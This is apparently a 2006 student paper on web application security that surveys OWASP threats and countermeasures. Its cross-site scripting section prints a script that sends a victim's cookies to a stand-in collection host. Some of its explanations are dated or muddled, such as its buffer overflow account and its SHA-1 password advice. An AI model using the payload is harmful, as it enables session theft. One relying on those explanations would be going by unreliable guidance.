College of Business Administration
University of Missouri, St. Louis
MSIS 6840
November 29, 2006
Introduction
Trends
Challenges
Client-server versus Web Application
Key Differences
OWASP Top Ten Most Critical Web Application Security Vulnerabilities
Conclusion
Description of Threats
(Buffer Overflow, Cross-Site Scripting Flaws, Broken Access Control a.k.a. Forceful Browsing, Enumeration Attack, Unvalidated Input, Broken Authentication and Session Management, Improper Error Handling, Denial of Service)
References
Traditionally, enterprises focused on client-server architecture to satisfy their information needs. This model of processing enabled multiple users to access data and processing power at a central location through hard-wired client computers. The architecture required limited sophistication from the client computers and large, heavy-duty servers that would take requests, process them, and simply return the results. This was considered the “PC revolution” (1) compared to the host-based computing and batch processing of the 1950s and 60s.
In the 1990s, the Internet added mobility and expanded access to information systems (2); however, the client-server model prevailed. Web browsers (3) made their appearance as the tools to surf the World Wide Web, but they offered little more than the dumb terminals of the ’70s and ’80s. Web browsers as clients are still connected via (more sophisticated) networks and make requests to centrally located server systems to ultimately display processed data. Although the means (clients and servers) have advanced, the architecture of modern-day computing has remained the same and has retained many disadvantages and vulnerabilities.
The main concern of network administrators, especially in large organizations with sensitive data, is unauthorized access (4). The danger of outsiders tapping into a network and gaining access to data can jeopardize a firm’s reputation and cause legal nightmares, let alone the loss or corruption of crucial information. The hazard is multiplied when access to such databases is given to anyone with a Web browser: the possibilities of an attack increase dramatically (5), and any network must be able to withstand multiple attacks without inhibiting authorized user access.
Companies are using Web applications to access and process important data. Web applications gained popularity in the 1990s as the World Wide Web expanded, and the promise of faster, seamless collaboration enticed users (in this case, corporations) to adopt this technology as fast as possible. In recent years, business intelligence and knowledge-sharing systems have become more than a convenience; they are perceived as critical to strategic success in almost any industry (6).
Since companies already had legacy client-server IT infrastructure in place, their main focus was simply to migrate the architectural concept and adapt it for use in Web applications. The main reason for this was limited budgets and cost cutting (7). Management perceived that the existing client-server infrastructure could serve as the foundation for Web applications, thus serving as a means to optimize resources.
Additionally, multitudes of users were gaining access to computers and the World Wide Web, and these applications were gaining popularity within various market segments. The use of Web-based applications would allow corporations to expand their market share by penetrating new target segments. On the other hand, competitors were adopting new Web applications and, therefore, businesses had to maintain at least similar standards in order to stay in the game.
According to John Pescatore of Gartner Group (1i), “…close to 80% of today’s attacks are tunneling through Web applications”. This is a disturbingly large number, all the more so because Web applications handle critical information and data, making anyone with a computer and access to the Internet a potential threat.
Companies spend thousands of dollars (8) and countless man-hours to ensure that Web applications run smoothly and are safeguarded against attack (2i). Most attacks are attributed to known threats such as worms (3i) (malicious programs that replicate themselves constantly, without requiring another program to provide a safe environment for replication), viruses (4i) (segments of code that perform malicious actions), and identified vulnerabilities found in application servers (4i).
According to Michael E. Whitman and Herbert J. Mattord (9), “…hackers are people who use and create computer software to gain access to information illegally.” Hackers exploit the vulnerabilities found within the application itself to extract sensitive data from corporate databases (10). Most of these vulnerabilities arise from the fact that Web applications are fundamentally different from client-server platforms. (Other challenges have been identified; however, they are outside the scope of this paper.)
In order to better understand the differences between client-server and Web applications, it is important to first look at their formal definitions.
According to Education World (5i), “Client-server is a two tiered architecture, where two computer systems are linked by a network or modem connection, and the client computer uses resources by sending requests to the server computer.” In other words, client-server is an environment in which a server application and a client application are written to work together. For these two components to remain compatible, every time a program or application changed on the server, all client nodes needed to be updated. In addition, the client had to be compatible with multiple programs, making deployment and maintenance expensive. Another arduous task faced by administrators was installing applications onto every client machine at every location. If any updates were made to an application, the upgraded version had to be re-installed on each individual machine.
On the other hand, Web applications do not share several of these characteristics. According to Wikipedia.org (6i), “Web applications are delivered to users from a web server over a network such as the World Wide Web”. In other words, the browser in any computer system is the standard client component, and the rest is downloaded automatically every time a user invokes an application. Thus, clients are platform independent, deployment is virtually free, and no maintenance is required on the part of the administrator (4i). Moreover, administrators have the flexibility to update and maintain web applications without distributing and installing software on potentially thousands of client computers. This in itself eliminates any need for compatibility checks, installation, and re-installation. Web applications invoke a remote server system to transmit the application interface (prompts, buttons, and logic) together with the required data; on the client-server side, clients have the interface already installed and the server transmits only processed data.
I) Client-server applications perform data validation on the client side for an enhanced user experience, and clients were purpose-built and therefore difficult to reverse engineer. This made it difficult for any user to modify code at the source, since most or all of it was invisible. Web applications, however, use browsers, which expose the source of the client-side application to virtually anyone. This makes it easy for users to download and manipulate the source code, creating security concerns. Two of the most common attacks threatening Web applications are Buffer Overflow and Cross-Site Scripting Flaws.
II) Another feature of client-server is that users must log in to one server to gain access. This creates one-on-one communication between client and server, which enables the client to control all user interaction; the client can enable or disable functions every time a user logs in. Web applications, however, run many scripts on several web servers, thus creating several entry points (6), and each of these entry points is a potential hazard. Because of this, the application cannot enforce user behavior or maintain the flow of communication from a single point. A common attack threatening Web applications is Broken Access Control, also known as Forceful Browsing.
III) Once a user logs in, a ‘session’ is established connecting the client and server. This allows the client to continuously feed information to the user, and the session is maintained uninterrupted until the user logs out. This way, the client monitors all the information exchange. This is not the case with Web applications, because the user does not ‘log in’ in the traditional sense. No ‘session’ is established, and administrators must develop an appropriate application to keep track of user activities. The browser acts as a gateway through which many server applications send pieces of information to be compiled and presented to the user. There is no session per se; however, the intricacies of the communication are hidden from the user to a degree that it seems as though a session is established. Common threats related to the stateless nature of Web applications are input tampering (unvalidated input) manipulations such as SQL Injection, Cookie Poisoning, and Hidden Field Manipulation.
IV) The client-server platform has a limited number of clients, a number that perhaps runs into the hundreds or small thousands for very large organizations. But since the Web browser is accessible to literally millions of potential users, the server must be able to handle input from any of them. This is how many attacks occur: hackers exploit this difference to overload servers and expose raw data. A common threat is the Enumeration Attack, where users can manipulate requests, override the server’s security, and gain access to sensitive data.
V) Web administrators store sensitive data and information in databases or files. This data can include user accounts, passwords, banking information, etc. Users entrust corporations to safeguard this information. Administrators use encryption to protect it; however, problems often arise when security methods are not properly applied to Web applications. Web applications become susceptible to attack when proper encryption is not applied and the application is not secured from intrusion. Since users’ sensitive data is stored in these databases, an intrusion by an attacker can put the corporation in real trouble.
Web administrators may face real trouble when they fail to encrypt critical data, use insecure storage of passwords, use poor algorithms, and fail to include support for encryption key changes and other required maintenance procedures. “The easiest way to protect against cryptographic flaws is to minimize the use of encryption and only keep information that is absolutely necessary. For example, rather than encrypting credit card numbers and storing them, simply require users to re-enter the numbers. Furthermore, instead of storing encrypted passwords, use a one-way function such as SHA-1 to hash the passwords” (9).
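The one-way hashing advice in the quotation can be sketched as follows. This is a minimal illustration using Python’s standard hashlib; the function name is invented for this sketch, and it mirrors the 2006-era recommendation above. Modern practice would favor a salted, deliberately slow hash (e.g. bcrypt) over plain SHA-1.

```python
import hashlib

def hash_password(password: str) -> str:
    """Return a one-way SHA-1 digest of the password.

    Storing the digest instead of the password itself means a database
    breach does not directly reveal user credentials.
    """
    return hashlib.sha1(password.encode("utf-8")).hexdigest()

# A login attempt is verified by hashing the supplied password and
# comparing digests; the plaintext is never stored.
stored = hash_password("s3cret")
assert hash_password("s3cret") == stored   # correct password matches
assert hash_password("guess") != stored    # wrong password does not
```

The same idea generalizes to any secret the application only needs to verify, never to read back.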
The Open Web Application Security Project (OWASP) (7i) is dedicated to helping organizations understand and improve the security of their web applications and web services. This organization has created a Top Ten list which highlights the most serious web vulnerabilities. Increasingly, hackers are turning their attention to common weaknesses in Web applications, while administrators strive to tighten security without compromising the user experience.
Figure 1 has been specifically adapted to illustrate the OWASP Top Ten Project list.
In conclusion, client-server and Web applications are fundamentally different in many ways, although they share common characteristics. The sheer scale of Web applications alone creates a need to differentiate the way the two architectures are perceived. Therefore, the rules and policies that worked effectively in a client-server environment cannot be applied unmodified to Web applications. The key differences, as outlined and discussed in this paper, concern client-side code exposure, multiple entry points, session management, the scale of the user base, and the storage of sensitive data.
Web security should perform some basic functions for an organization (8). It should protect the organization’s ability to function, enable the safe operation of applications implemented on the corporation’s systems, protect the data the corporation collects and uses, and safeguard the applications themselves. Multitudes of users are gaining access to computers and the World Wide Web, making Web applications available to a larger, less-trusted user base than legacy client-server applications. Many companies are taking initiatives to prevent these types of break-ins, such as code reviews, extensive penetration testing, and the installation of intrusion detection/prevention systems and devices. However, most of the solutions available today use negative security logic, i.e., working from a list of known attacks and trying to prevent them. Negative security logic solutions can prevent known, generalized attacks, but are ineffective against novel, targeted malicious activity.
Overall, in today’s web-distributed computing, the need for new concepts and new designs is more apparent than ever. Every new system based on this architecture has an inherently flawed design and will pose security threats. In a few years it may make sense to re-design web applications in order to eliminate these vulnerabilities; after all, the cost of defending contemporary systems against threats may eventually exceed the cost of a re-design.
This is a common threat that occurs because the source of the client-side application is exposed to virtually anyone who accesses the browser. This makes it easy for an attacker to change code or input irregular data. “…buffer overflow occurs when Web application components in some languages that do not properly validate input can be crashed and, in some cases, used to take control of a process” (3i). When an attacker supplies input that the application cannot properly handle, the application overruns the memory buffer allocated for that input, writing into memory that had been allocated to other purposes.
Attackers use buffer overflows to manipulate the execution of a web application. They send malicious input that can cause the web application to execute arbitrary code, effectively taking over the machine. Buffer overflows are not easily detected, which makes them even harder to defend against, and attackers have managed to identify buffer overflows in a staggering number of products and components. A classic example of buffer overflow arises when the browser has a form that requires the user to input a limited number of digits. For instance, zip codes (12345) commonly require only 5 digits. In this case, the attacker will key in a long string of numbers, e.g. 324168764213578546754342313768764146940987655443.
The server application components cannot validate this input and will therefore compromise the entire application by eating into memory allocated to other tasks. Once this is achieved, the attacker can pass through the server into deeper layers of the infrastructure. Once in, he/she can disable applications and modify code to execute as he/she wishes.
One way to prevent this attack is to use an application firewall to detect input that exceeds the length a form allows: if the form requires 5 digits, then any input longer than 5 digits should raise an alert. The firewall would also serve to check inputs from the client and monitor any irregular input. Another countermeasure is to use HTML and JavaScript to limit the number of characters that can be typed into any form or parameter.
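The server-side length check described above can be sketched as follows; the field names and limits are assumptions for illustration, not taken from the paper.

```python
# Declared maximum lengths per form field (illustrative values).
MAX_LENGTHS = {"zip_code": 5, "user_name": 32}
DEFAULT_MAX = 256  # fallback limit for fields not listed above

def validate_lengths(form: dict) -> bool:
    """Return True only if every submitted field respects its length limit.

    Rejecting oversized input before it reaches application components
    prevents the overflow scenario described in the text.
    """
    return all(
        len(value) <= MAX_LENGTHS.get(field, DEFAULT_MAX)
        for field, value in form.items()
    )

# A 5-digit zip code passes; the attacker's long numeric string is rejected.
assert validate_lengths({"zip_code": "12345"})
assert not validate_lengths(
    {"zip_code": "324168764213578546754342313768764146940987655443"}
)
```

Client-side HTML limits (e.g. a maxlength attribute) improve usability, but only a server-side check like this one cannot be bypassed by editing the page.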
“Cross-Site Scripting Flaws occur when the web application can be used as a mechanism to transport an attack to an end user's browser” (3i). A successful attack can disclose the end user’s session token, attack the local machine, or spoof content to fool the user. Cross-site scripting vulnerabilities (also called XSS) occur when an attacker uses a web application to send malicious code, generally in the form of a script, to another user. These flaws are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating it. Since most browsers support JavaScript and HTML, the attacker can assume that an injected script will be downloaded into and executed by the victim’s browser. This attack is mostly launched on websites where a lot of posting takes place, such as bulletin boards and auction sites. By injecting a script, the attacker can steal users’ cookies, send them to a collection server (here named ‘localhost’), and use the information to impersonate the victims. An example of the code used would be:
<script language="javascript">
document.write('<img src="http://localhost/?url=' + document.location + '&cookie=' + document.cookie + '">');
</script> (12)
Web administrators should take extra measures to monitor every server for malicious input. Any access should be terminated if suspicious input is detected, and any unauthorized access should be denied. Unfortunately, this measure requires companies to redesign some applications. To avoid high costs and redesign, companies opt to install network devices that detect malicious input. The devices may be less expensive, but they lack the sophistication to differentiate between benign and malicious input. This causes the devices to miss too many attacks and fall short of their objective, unless they have an application policy to detect irregular input, differentiate between valid and malicious input, and hence block unwanted requests while allowing valid ones through.
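A positive measure complementary to the monitoring described above is to escape user-supplied text before echoing it into a page, so that an injected script is rendered as inert text rather than executed. A minimal sketch in Python (the function name and markup are illustrative):

```python
import html

def render_comment(user_input: str) -> str:
    """Escape user-supplied text before embedding it in a page.

    html.escape converts <, >, &, and quotes into HTML entities, so a
    posted <script> tag is displayed literally instead of running.
    """
    return "<p>" + html.escape(user_input) + "</p>"

# The XSS payload from the text becomes harmless entity-encoded text.
safe = render_comment("<script>document.write(document.cookie)</script>")
assert "<script>" not in safe  # the payload is neutralized, not executed
```

Escaping at output time works even for input that slipped past earlier validation, which is why it is usually applied in addition to input checks, not instead of them.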
Access control, sometimes also called authorization, is how a web application permits some users to gain access to content and functions while others cannot. These access control checks are performed after authentication and establish what authorized users are permitted to do. Access control sounds like a simple problem but is deceptively difficult to implement correctly (9). A web application’s access control model is closely tied to the content and functions that the site provides. In addition, users may fall into a number of groups or roles with different abilities or privileges. When restrictions on what authenticated users are allowed to do are not properly enforced, Broken Access Control and/or Forceful Browsing can occur.
Strangely, many users unknowingly engage in forceful browsing with no malicious intent. When a person uses the Favorites menu in the Internet Explorer browser, he/she is bookmarking a page. More often than not, bookmarking allows a user to go to a web page without passing through the homepage of the website. This means the user can bypass previous pages that may require some sort of authentication. Search engines like Google, Yahoo! or MSN also allow users to find and follow public links to interior pages of websites, which again means the user may bypass the site’s prior authentication pages.
Another similar method attackers use is bypassing by intelligent guessing. For example, they will skip over registration pages by taking a web link such as www.website.com/public, omitting the word ‘public’, and substituting words like ‘restricted’ or ‘private’, e.g.: www.website.com/restricted, www.website.com/private, www.website.com/confidential, www.website.com/secret, www.website.com/classified.
In this way, attackers gain access to users' accounts, which enables them to view personal information. It can also permit them to infiltrate corporate databases and view sensitive files or crucial data. Then, what is to stop them from performing any kind of unauthorized function?
Web administrators should preplan an application’s access control requirements and capture them in a web application security policy. It is important to use an access control matrix to define the access control rules, including a list of accessible and authorized requests.
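The access control matrix mentioned above can be sketched as a simple lookup table that is consulted on every request, so that typing a guessed URL like /restricted fails unless the role is explicitly granted it. The roles and paths here are hypothetical.

```python
# Hypothetical access control matrix: each role maps to the set of
# paths it may request. Anything not listed is denied by default.
ACCESS_MATRIX = {
    "anonymous": {"/public"},
    "member":    {"/public", "/account"},
    "admin":     {"/public", "/account", "/restricted"},
}

def is_authorized(role: str, path: str) -> bool:
    """Deny by default: allow a request only if the matrix lists it."""
    return path in ACCESS_MATRIX.get(role, set())

# Forceful browsing to /restricted fails for everyone except admins,
# regardless of how the user discovered the URL.
assert is_authorized("admin", "/restricted")
assert not is_authorized("anonymous", "/restricted")
assert not is_authorized("member", "/restricted")
```

The key property is the deny-by-default rule: an unknown role or an unlisted path yields no access, so a forgotten page cannot be reached by guessing.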
The client-server platform is designed around servers connecting and communicating with a limited (and known) number of clients, whereas a Web application is accessed and used by thousands or even millions of users. “Enumeration Attack is an attack in which the target host is made to enumerate (or list) the various resources available on the host/network” (8i). Examples of such resources include user accounts, services, privileges, and information. Many attacks occur this way: hackers exploit this difference to overload servers and expose raw data. Enumeration is one of the most popular ways for an attacker to gather information about the users inside a database.
For instance, the attacker will use only one PIN for numerous user accounts; see Figure 2. As most of us have experienced, most Web applications use a detection mechanism for anyone trying to access one user account with different PINs or passwords. For example, if one forgets the PIN to a bank account, the account is suspended after three failed tries and the user is requested to contact a customer representative. However, this attack differs in the sense that the password or PIN is kept constant and unchanged, and the attacker tries numerous user names until a match is found.
Figure 2.
Once the attacker gains entry into the deeper layers of the application, all user accounts, privileges, services, information, etc. become available to him/her.
One way to prevent this attack is to redesign the application with the capability to monitor unauthorized access to the login page. Another way is to use an application firewall.
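The login-page monitoring suggested above might look like the following sketch, which counts failures per client address across all user names, so a constant-PIN, varying-username sweep still trips the limit even though no single account sees three failures. The names and threshold are assumptions for illustration.

```python
from collections import defaultdict

FAILED_LIMIT = 3                       # lockout threshold (illustrative)
failures_by_source = defaultdict(int)  # failed attempts per client address

def record_login(source_ip: str, success: bool) -> bool:
    """Return False (lock out the source) once it exceeds the failure limit.

    Counting per source rather than per account catches enumeration sweeps
    that spread their guesses across many user names.
    """
    if success:
        failures_by_source[source_ip] = 0
        return True
    failures_by_source[source_ip] += 1
    return failures_by_source[source_ip] <= FAILED_LIMIT

# Three failed guesses are tolerated; the fourth locks the source out.
for _ in range(3):
    record_login("203.0.113.9", success=False)
assert record_login("203.0.113.9", success=False) is False
```

In practice this would be combined with per-account lockouts and logging, since attackers can also rotate source addresses.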
In Web applications the client does not connect to the server by establishing a session when the user logs in. Since there is no session, the server cannot keep track of user activities and hence cannot validate the input. An Unvalidated Input attack occurs when information from web requests is not validated before being used by a web application. Attackers may use these flaws to attack deeper layers through a web application.
In this kind of input tampering attack, the attacker attempts to bypass the website's security. Since Web applications use HTTP, attackers try to manipulate any part of an HTTP request, such as the URL, cookies, form fields, and hidden fields. The most common input tampering attacks are cookie poisoning, SQL injection flaws, and hidden field manipulation. Input tampering attacks also include the forceful browsing, XSS, and buffer overflow attacks mentioned earlier in this paper.
Cookie Poisoning “…is an input tampering attacking the fields (parameters) stored in a cookie” (9). Cookie poisoning is “an attack which alters the value of a cookie on the client side prior to a request to the server” (4i). It is commonly more harmful than other tampering attacks because administrators store sensitive data in cookies. The attacker penetrates the security layers to gain access to personal information by modifying the contents of the cookie. Cookies are manipulated with JavaScript to expand the functionality of an application. Using cookie poisoning attacks, attackers can gain unauthorized information about another user, steal his or her identity, and impersonate the victim.
It is not easy to detect cookie poisoning attacks because no session is established to enforce ‘statefulness’. Simplistic intrusion detection systems that are not Web-application oriented may not detect this attack because such products cannot trace users by session, and therefore cannot track information on each specific user currently logged into the Web application. It is crucial for administrators to have the Web server digitally encrypt and sign every cookie. This is a tedious task because they have to patiently add code to every instance.
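Digitally signing each cookie, as recommended above, can be illustrated with an HMAC: the server appends a keyed digest to the cookie value, so any client-side edit no longer matches the digest and is rejected. The key and cookie contents below are placeholders.

```python
import hashlib
import hmac

SECRET_KEY = b"server-side secret"  # assumed to exist only on the server

def sign_cookie(value: str) -> str:
    """Append an HMAC so any client-side modification is detectable."""
    mac = hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}|{mac}"

def verify_cookie(cookie: str) -> bool:
    """Recompute the HMAC over the value and compare in constant time."""
    value, _, mac = cookie.rpartition("|")
    expected = hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)

cookie = sign_cookie("role=member")
assert verify_cookie(cookie)
# A poisoned cookie (member changed to admin) fails verification.
assert not verify_cookie(cookie.replace("member", "admin"))
```

Signing detects tampering; if the cookie contents must also stay secret, encryption would be layered on top of (or instead of) the plain value.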
SQL Injection Flaw “…is an exploitation in which an attacker inserts SQL commands into form or parameter values rather than legitimate data” (4i). Attackers exploit this Web application vulnerability to send malicious code to other systems or users through the Web application. If a Web application is poorly designed, an entire script can be injected and executed. These attacks are calls to back-end databases using SQL: SQL injection exploits non-validated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database. A form or parameter is expected to receive alphanumeric input, but the attacker instead supplies an SQL query. The application splices this form data into an SQL query to its database, creating unintended behavior. For example: select * from table.
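A common way to close this hole is to keep user input out of the SQL text entirely by using parameterized queries, so the database treats the input as data and never as commands. A minimal sketch using Python's built-in sqlite3 (the table and rows are invented for illustration):

```python
import sqlite3

# Toy in-memory database standing in for the backend described in the text.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

def lookup(name: str):
    """Fetch a user's row via a placeholder, never string concatenation.

    The ? placeholder binds the input as a value, so SQL fragments in the
    input cannot alter the query's structure.
    """
    return conn.execute(
        "SELECT secret FROM users WHERE name = ?", (name,)
    ).fetchall()

assert lookup("alice") == [("s3cret",)]
# The classic injection string is just an unmatched literal name here.
assert lookup("alice' OR '1'='1") == []
```

Had the query been built by concatenating strings, the second call would have returned every row; with binding, the attack string simply matches no user.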
Hidden Field Manipulation “…is attacking the HTML code of the page and changing the value of hidden fields so as to compromise the entire logic” (10). Hidden fields are parameters that are unseen by the user and are used to provide status information to the Web application. Attackers can view the HTML code of the web page and tamper with the hidden field values, thus altering the logic between various application parts. A common example of hidden field manipulation is changing the source code and the parameters in a form field (4i).
Administrators can redesign every application so that all dynamic information is placed into an encrypted cookie. This will also allow them to monitor request traffic and detect any changes in dynamic parameters.
As mentioned earlier, Web applications do not establish ‘sessions’ (8i). Therefore, Web applications require users to authenticate themselves with a user ID, user account, and password. However, since HTTP does not provide sessions to keep track of the stream of requests from each user, Web applications must create session management capabilities for themselves. Attackers who can compromise passwords, session cookies, or other tokens can defeat authentication restrictions and impersonate other people. Unfortunately, even solid authentication mechanisms can be undermined by flawed credential management functions. Web administrators should store passwords and other sensitive data in properly encrypted files. They can encourage users to make their passwords complex by using alphanumeric and non-alphanumeric characters, and users should change their passwords regularly.
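The session management capability described above can be sketched as a server-side token table: at login the server issues an unguessable token, the browser presents it with each request, and the server maps it back to a user. All names here are illustrative.

```python
import secrets

sessions = {}  # token -> user id, kept entirely on the server

def create_session(user_id: str) -> str:
    """Issue a cryptographically random token after successful login.

    The browser stores only this opaque value (e.g. in a cookie); the
    user's identity never travels in a guessable or editable form.
    """
    token = secrets.token_urlsafe(32)
    sessions[token] = user_id
    return token

def current_user(token: str):
    """Resolve a presented token; unknown or forged tokens map to None."""
    return sessions.get(token)

t = create_session("alice")
assert current_user(t) == "alice"
assert current_user("forged-token") is None
```

Because tokens come from a cryptographic generator, an attacker cannot enumerate valid sessions; a production version would also expire tokens and invalidate them on logout.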
Error messages are used as guidelines for fixing a problem (9). They contain information on what the error is and why it occurred; in other words, they give detailed information not only about the error but may also reveal information about the system itself and how it operates. Attackers may use this information to look for weaknesses in the application and mount an attack. The most common form of improper error handling is displaying detailed internal error messages, such as error codes, to the general public. These messages reveal implementation details that can give hackers important clues about application flaws. Even when messages don’t reveal much detail, inconsistencies can still offer important clues about how the application works. Web administrators can create a log file that captures relevant, detailed information in a secure log for future analysis, while presenting users with a generic error message that does not contain sensitive information.
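The log-file approach described above might look like this sketch: the full exception detail goes to a private log, while the user sees only a generic message carrying a reference ID that support staff can match against the log. All names are invented for illustration.

```python
import logging
import uuid

log = logging.getLogger("webapp")  # destination configured by the operator

def handle_error(exc: Exception) -> str:
    """Log full detail privately; show the user only a generic message."""
    incident = uuid.uuid4().hex[:8]          # reference id tying message to log
    log.error("incident %s: %r", incident, exc)
    return f"An internal error occurred (ref {incident}). Please try again."

# The user-facing message leaks no schema or implementation detail.
msg = handle_error(ValueError("bad column 'password' in table users"))
assert "password" not in msg
assert "ref " in msg
```

The reference ID preserves supportability: the user can quote it, and an administrator can find the full stack trace in the secure log without anything sensitive having crossed the wire.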
Web applications are designed to handle the normal flow of traffic, i.e., legitimate users sending HTTP requests (11i). However, a Web application cannot differentiate between legitimate and malicious requests because it is not easy to identify where an HTTP request is coming from. Denial of service occurs when an attacker attempts to shut down the normal operation of an application by overwhelming the system with a large number of connection or information requests. The attacker sends so many requests to the target application that it cannot respond to legitimate ones. It is difficult to protect against denial of service, but administrators can limit the resources allocated to any user to a bare minimum. For authenticated users, it is possible to establish quotas that limit the load a particular user can put on the system. Another approach is to allow each user a single outstanding request: as soon as another request is initiated, the previous one is terminated. For unauthenticated users, unnecessary access to databases or files should be denied; a useful approach might be to cache the content served to unauthenticated users instead of generating it or retrieving it from databases.
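The per-user quota idea can be sketched as a sliding-window rate limiter: requests older than the window are forgotten, and a user who exceeds the quota inside the window is refused until it rolls past. The window and limit values are arbitrary for illustration.

```python
import time
from collections import defaultdict, deque

WINDOW_SECONDS = 60   # length of the sliding window (illustrative)
MAX_REQUESTS = 5      # assumed quota per user per window

history = defaultdict(deque)  # user -> timestamps of recent requests

def allow_request(user: str, now: float) -> bool:
    """Refuse requests once a user exceeds the quota inside the window."""
    q = history[user]
    while q and now - q[0] > WINDOW_SECONDS:
        q.popleft()                  # forget requests outside the window
    if len(q) >= MAX_REQUESTS:
        return False                 # quota exhausted: shed this request
    q.append(now)
    return True

t0 = time.time()
assert all(allow_request("bob", t0) for _ in range(5))
assert not allow_request("bob", t0)       # sixth request in the window denied
assert allow_request("bob", t0 + 61)      # quota recovers after the window
```

Under flood conditions the expensive application logic is never invoked for over-quota users, which is exactly the load-limiting behavior the paragraph describes.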
Non-web citations
1- Unknown, Asia Computer Weekly, Two Decades of Technology. Singapore: Jun 28, 1999. pg. 1
2- Jones,George; Elgan, Mike and Potter, Valerie, Fifteen World-Widening Years. InformationWeek. Manhasset: Sep 18, 2006., Iss. 1106; pg. 41, 6 pgs
3- Greisiger, Mark. The Perils of Web Site Liability. New York: Jul 2002. Vol. 49, Iss. 7; pg. 26, 5 pgs
4- Cooney, Michael, Execs Express Top Security Concerns. Network World. Framingham: Jun 5, 2006.Vol.23, Iss. 22; pg. 19, 2 pgs
5- Orr, Bill, Transaction Security. American Bankers Association. ABA Banking Journal. New York: Sep 1995.Vol.87, Iss. 9; pg. 84, 1 pgs
6- Foster, Susan; Hawking, Paul and Stein, Andrew, Business Intelligence Solution Evolution: Adoption and Use. Business Intelligence Journal; Fall 2005; 10, 4; ABI/INFORM Global. pg. 44
7- Thelwall, Mike and Stuart, David. Web Crawling Ethics Revisited: Cost, privacy, and denial of service. Journal of the American Society for Information Science and Technology. Hoboken: Nov 2006. Vol. 57, Iss. 13; pg. 1771
8- Heimann, John, Oracle, The Importance of Security Training. CIO Update guest columnist. May 23, 2006.
9- Whitman, Michael E. and Mattord, Herbert J., Principles of Information Security. Boston: Course Technology, 2003
10- Wiedrick-Kozlowski, Jan / Harnetty, Dawn / Angeloni, Jon, Malicious Code on Storage and Caching Servers and Web 2.0 Security Risks Named as Top Malware Threats in Newly Released Web Security Trends Report From Finjan. New York: Oct 11, 2006. pg. n/a
11- Kesh, Someswar, Ph.D. and Ramanujan, Sam, Ph.D., Central Missouri State University, Warrensburg, MO, A Model for Web Server Security. Journal of American Academy of Business, Cambridge. Hollywood: Mar 2004. Vol. 4, Iss. 1/2; pg. 354
Web citations
1i- http://www.ntobjectives.com/know/indoverview.php
2i- http://www.cgisecurity.com/owasp/html/guide.html#id2840663
3i- http://www.cisco.com/web/strategy/docs/healthcare/physician_guide.pdf
4i- http://ctva.mccneb.edu/gsparks/Lecture_Files/INFO_2805/ch02_files/frame.htm#slide0041.htm
5i- http://www.educationworld.com/help/glossary.shtml
6i- http://en.wikipedia.org/
7i- http://www.f5.com/solutions/technology/vulnerabilities_wp.html
8i- http://www.owasp.org/
9i- www.rootsecure.net/content/downloads/pdf
10i- www.rti.org
11i- http://www.computeractive.co.uk/